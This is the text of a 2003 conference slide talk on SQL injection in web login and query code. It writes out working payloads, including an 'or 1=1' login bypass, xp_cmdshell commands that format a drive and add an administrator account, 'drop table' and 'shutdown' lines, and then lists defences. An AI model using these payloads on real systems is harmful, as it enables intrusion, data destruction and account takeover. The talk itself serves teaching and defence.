Defending Applications Against Command Insertion Attacks Penn State Web Conference 2003 Arthur C. Jones June 18, 2003
The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses. The Open Web Application Security Project (OWASP) is an Open Source community project staffed entirely by volunteers from across the world. The project is developing software tools and knowledge based documentation that helps people secure web applications and web services. Much of the work is driven by discussions on the Web Application Security list at SecurityFocus.com. All software and documentation is released under the GNU public licenses.
The OWASP Top-10 Unvalidated Parameters Unvalidated Parameters Broken Access Control Broken Access Control Broken Account and Session Management Broken Account and Session Management Cross-Site Scripting (XSS) Flaws Cross-Site Scripting (XSS) Flaws Buffer Overflows Buffer Overflows Command Injection Flaws Command Injection Flaws Error Handling Problems Error Handling Problems Insecure Use of Cryptography Insecure Use of Cryptography Remote Administration Flaws Remote Administration Flaws Web and Application Server Misconfiguration Web and Application Server Misconfiguration
The front door: Any time the user can supply free- form text that will be incorporated directly into a SQL statement. Username: Password:
How the lock works: ASP/PHP/CGI is used to compose a SQL querry SELECT * FROM tbl_Users WHERE UID='testuser' AND PWD='testpass'
How the lock fails: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1;--'
Going through the broken lock…
Is Account_No really a number?
Going through the broken lock…
‘; INSERT INTO tbl_Users VALUES ‘newuser’, ‘password’, ’lastname’, ‘firstname’, ‘account’;-- ‘; INSERT INTO tbl_Users VALUES ‘newuser’, ‘password’, ’lastname’, ‘firstname’, ‘account’;-- ‘; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE ORDER BY UID) WHERE UID=‘newuser’;-- ‘; UPDATE tbl_Users SET L_Name=(SELECT TOP 1 UID FROM tbl_Users WHERE ORDER BY UID) WHERE UID=‘newuser’;--
Fun things you can you do with a broken lock: SELECT * FROM tbl_Users WHERE UID='‘; exec master..xp_cmdshell ‘dir c:\ > c:\inetpub\wwwroot\directory.txt’;--' ANDPWD='' You should then be able to browse to the file you have just created.
Fun things you can you do with a broken lock: SELECT * FROM tbl_Users WHERE UID='jsmith' AND PWD='' or 1=1; exec me.’;--'
Causing damage: ‘; shutdown with nowait;-- ‘; shutdown with nowait;-- Get the name of the table by using a “having” clause (‘ having 1=1;--), then ‘; drop table tablename;-- Get the name of the table by using a “having” clause (‘ having 1=1;--), then ‘; drop table tablename;--
Causing damage: how about this: ‘; exec master..xp_cmdshell ‘format c: /q /yes’;-- how about this: ‘; exec master..xp_cmdshell ‘format c: /q /yes’;-- or this: ‘; exec master..xp_cmdshell ‘net user newacct password /add’; exec master..xp_cmdshell ‘net localgroup administrators newacct /add’;-- or this: ‘; exec master..xp_cmdshell ‘net user newacct password /add’; exec master..xp_cmdshell ‘net localgroup administrators newacct /add’;--
What can we do about it: Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need. Be aware of the contexts the program will run in. Accounts should have specific permissions; only the permissions they need. Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc…) Don’t depend on client-side checks Scrub all user input: only accept allowed string lengths, escape quotes, look for suspicious text (--, xp_, drop, etc…) Don’t depend on client-side checks
What can we do about it: Redirect the default error messages. Redirect the default error messages. Move ASP-built SQL queries into stored procedures. Move ASP-built SQL queries into stored procedures. Check referral URL’s. Check referral URL’s. Don’t give away information for free. Don’t give away information for free. Keep application logs. Keep application logs.
Thank You! Questions?